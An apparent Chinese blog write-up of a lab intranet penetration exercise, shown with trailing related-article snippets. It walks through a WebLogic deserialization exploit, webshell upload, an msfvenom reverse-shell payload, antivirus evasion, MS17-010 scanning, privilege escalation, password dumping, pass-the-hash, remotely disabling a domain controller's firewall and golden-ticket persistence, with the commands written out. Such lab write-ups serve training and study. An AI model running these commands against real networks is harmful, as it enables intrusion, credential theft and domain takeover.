<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    內網學習 | 記一次內網滲透靶場學習

    一顆小胡椒2022-04-01 18:31:53

    環境搭建web:

    外網ip - 192.168.10.80

    內網ip - 10.10.10.80

    PC:

    外網ip - 192.168.10.201

    內網ip - 10.10.10.201

    DC:

    內網ip - 10.10.10.10

    web、PC、DC都處于同一域環境內,需要手動開啟weblogic服務

    外網端口探測首先nmap掃描一下端口發現了1433端口判斷是sql server,另外一個特征端口就是7001端口,判斷為weblogic端口

    nmap -T4 -sC -sV 192.168.10.80
    

    weblogic getshell這里訪問一下weblogic所在的7001端口,注意這里直接訪問7001端口會顯示404,這里直接訪問192.168.10.80:7001/console即可

    首先嘗試一下控制臺弱口令weblogic weblogic無果

    這里直接使用weblogic漏洞檢測工具,也可以使用weblogic批量掃描腳本去掃描,掃描發現存在幾個反序列化漏洞

    這里我是用CVE-2017-10271進行命令執行發現為administrator權限

    查看ip情況為雙網卡,初步判斷有域環境

    tasklist /svc查看一下進程發現了360主動防御,那么后面的馬就需要做免殺處理

    這里直接使用漏掃工具中自帶的jsp馬先上傳進行嘗試

    訪問一下能夠訪問到,那么已經上傳成功

    使用蟻劍嘗試連接失敗,這里我覺得可能是有360的原因,而jsp的馬在蟻劍默認是沒有加密解密器的,所以應該是被360給攔了

    這里我換一個冰蝎的馬傳上去試試

    使用冰蝎連接成功

    初步做一下信息搜集,發現DNS為de1ay.com,應該這個就是域的名稱

    上線msf這里首先生成一個msf的馬

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.30 lport=4444 -f exe > msf.exe
    

    使用冰蝎上傳到靶機上

    執行一下,這里因為有360的原因使用msf的原生馬是不能夠上線的,會被360攔截

    這里我后面使用了一下混淆進行了初步免殺處理,然后上線到了msf

    內網滲透socks代理掃描內網這里首先添加一個10.10.10.0/24段的路由,方便后續操作

    route add 10.10.10.0 255.255.255.0 1
    route print
    

    使用socks路由把msf帶入內網,需要在proxychains.conf里面添加路由

    use auxiliary/server/socks4a
    run
    

    這時候就可以使用msf中的udp_probe模塊對10.10.10.0/24段的主機進行信息搜集,這里發現10段還有另外兩臺主機,10.10.10.10和10.10.10.201

    這里使用常規的nmap對這兩個ip進行端口掃描發現什么都沒有掃出來,那么這里應該是有防火墻的原因

    ms17-010這里使用ms17-010模塊首先對內網進行掃描一下能不能夠通過漏洞直接進行橫向移動,注意因為有360的原因這里線程不要調的太高

    use auxiliary/scanner/smb/smb_ms17_010
    set rhost 10.10.10.0/24
    set threads 5
    run
    

    掃描完成后發現這里兩臺主機都可以利用永恒之藍,就結束了(嗎?)

    這里直接利用exp打一波,發現都打失敗了,應該是沒有開匿名管道的原因

    use exploit/windows/smb/ms17_010_eternalblue
    set rhosts 10.10.10.80
    run
    

    msf派生cs會話這里我在鼓搗半天之后使用getuid查看了一下當前的權限發現還只是一個user權限,也使用不了mimikatz,因為在cs上提權比較方便,這里就直接msf派生個對話給cs,在cs上進行提權操作

    使用payload-inject把msf的對話派生給msf

    use exploit/windows/local/payload_inject
    set PAYLOAD windows/meterpreter/reverse_http
    set DisablePayloadHandler true
    set LHOST 192.168.1.5
    set LPORT 5555
    set SESSION 2
    run
    

    這里在cs創建一個監聽host為192.168.1.5,port為5555接受msf的對話

    查看下內網ip的信息,dns為10.10.10.10,那么10.10.10.10大概率為域控

    查看一下主機信息,證實了猜想

    net computers
    

    權限提升這里因為是一個user權限首先要進行提權操作,使用systeminfo查看補丁情況發現只打了3個補丁,那么可以提權的exp有很多

    這里使用ms14-058直接提權到system

    使用logonpasswords導出密碼

    看到這里有一個SID為500的域管的帳號,那么直接可以用psexec進行hash傳遞橫向移動

    橫向移動這里首先掃描一下網段下的主機

    和基本判斷的一致,內網下有3臺主機

    這里使用80主機進行psexec操作

    這里psexec執行了但是沒有主機上線,這里想起來psexec是需要在防火墻關閉的情況下才能夠進行pth的,所以這里嘗試一下先ipc連接關閉防火墻后再進行psexec橫向移動

    使用ipc與10.10.10.10進行連接

    shell net use \\10.10.10.10\ipc$ 1qaz@WSX /user:Administrator
    shell net use
    

    使用sc創建計劃任務立即執行關閉域控防火墻

    sc \\10.10.10.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"    
    sc \\10.10.10.10 start unablefirewall    
    

    這里關閉之后psexec還是沒有成功,是因為這里DC只有內網ip,所以這里需要用到web進行中轉操作才能夠上線cs

    這里我用到cs的smb beacon進行流量中轉,首先建立監聽一個smb beacon

    再使用smb beacon進行psexec

    即可上線DC

    這里因為拿到了域管的帳號,這里也使用psexec的方式上線cs,這里當時可以使用批量pth進行上線

    上線成功

    權限維持這里使用到金票進行權限維持

    首先hashdump出krbtgt的hash值

    查看一下SID

    在web主機上生成金票

    可以看到這里dir域控c盤成功

    msf內網ip
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    web、PC、DC都處于同一域環境,需要手動開啟weblogic服務
    干貨!!!
    因為 web 服務器同時連接了外,所以必須首先拿下。這里有關 web 服務器的滲透不展開講了,無非也就是利用漏洞,諸如:弱口令、上傳漏洞、遠程代碼執行、各種 cms 漏洞,總之都是可以找到寫入 webshell 的方法。成功寫入 webshell 后,接著就要上傳木馬控制 web 服務器,這里可以用 Metasploit或 Cobaltstrike。
    滲透合集(三)
    2023-01-28 09:44:16
    jsp端口轉發滲透過程中,由于windows和linux的差別以及運行語言環境的限制導致端口轉發經常出現問題。于是自己寫了個簡單的JSP的端口轉發腳本。仿造 LCX的功能,具有正向、反向、監聽三種模式。對于目前數量眾多的JAVA WEB網站來說,可以比較方便的實現端口轉發。在這里發布出來,小伙伴們使用過程中,如果發現什么bug歡迎提交哈~參數說明/KPortTran.jsp?lip = local ip / 本地ip //一般為主機IP. lp = local port / 本地端口 //一般為主機端口
    滲透合集(二)
    2023-01-28 09:35:05
    接下來在內肉雞再次執行:htran -p -slave 公網肉雞IP 119 127.0.0.1 8009?linux也有實現,感覺使用方法更加明朗,且與windows下的兼容 在此推薦下。把windows的小做修改下,重新編譯了下,源程序比較簡單就不上傳工程文件了,直接給個C文件,自己編譯下即可。linux下實現大同小異,只不過用的fork實現子線程。此時在滲透測試端192.168.10.50可看到通道連接成功,效果如圖4。
    該篇章目的是重新牢固地基,加強每日訓練操作的筆記,在記錄地基筆記中會有很多跳躍性思維的操作和方式方法,大家能共同加油學到東西。
    可以看見命令執行成功。接下來直接寫入一個shell ,使用php 的 file_put_contents 函數寫個一句話木馬:http:. 驗證成功,直接使用蟻劍進行連接。對 192.168.22.x/24 網段進行掃描:.雖然在之前的掃描中發現了Target2 80端口存在一個cms,但是 滲透總是照著軟柿子捏,我們嘗試使用nmap 對Target2 進行端口掃描,尋找其開放的端口。Bage cms 滲透通過查看網頁底部指紋信息,知道這是一個bage cms搭建的網站,而且從時間上來看有些老舊。
    發現三個開放端口:22,80,330680端口利用發現是一個joomla搭建的網站Joomla是一套全球知名的內容管理系統,是使用PHP語言加上MySQL數據庫所開發的軟件系統。
    成功getshell后通過冰蝎上傳了一個哥斯拉shell接下來就是socks5代理了,上傳一個frp后發現服務端關了,事發突然并沒有做什么權限維持,到手的shell飛了經過分析和思考,造成這種情況的原因是直接拿了編譯好的frp沒做免殺,也許有全流量,設備報警提醒了,管理員發現異常后直接關機了。
    0x00 前言前段時間看到群里有師傅在討論如何讓虛擬機走物理機的代理流量,或者說讓局域網其他主機走某一臺主機的代理流量,今天抽空測試了幾款常用代理軟件的配置方法,分享給有需要的朋友,不喜勿噴!!!0x01 宿主機代理設置因為是虛擬機要走物理機的代理流量,所以我們得先查看下物理機的IP,后邊在連接這個代理時要用上。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类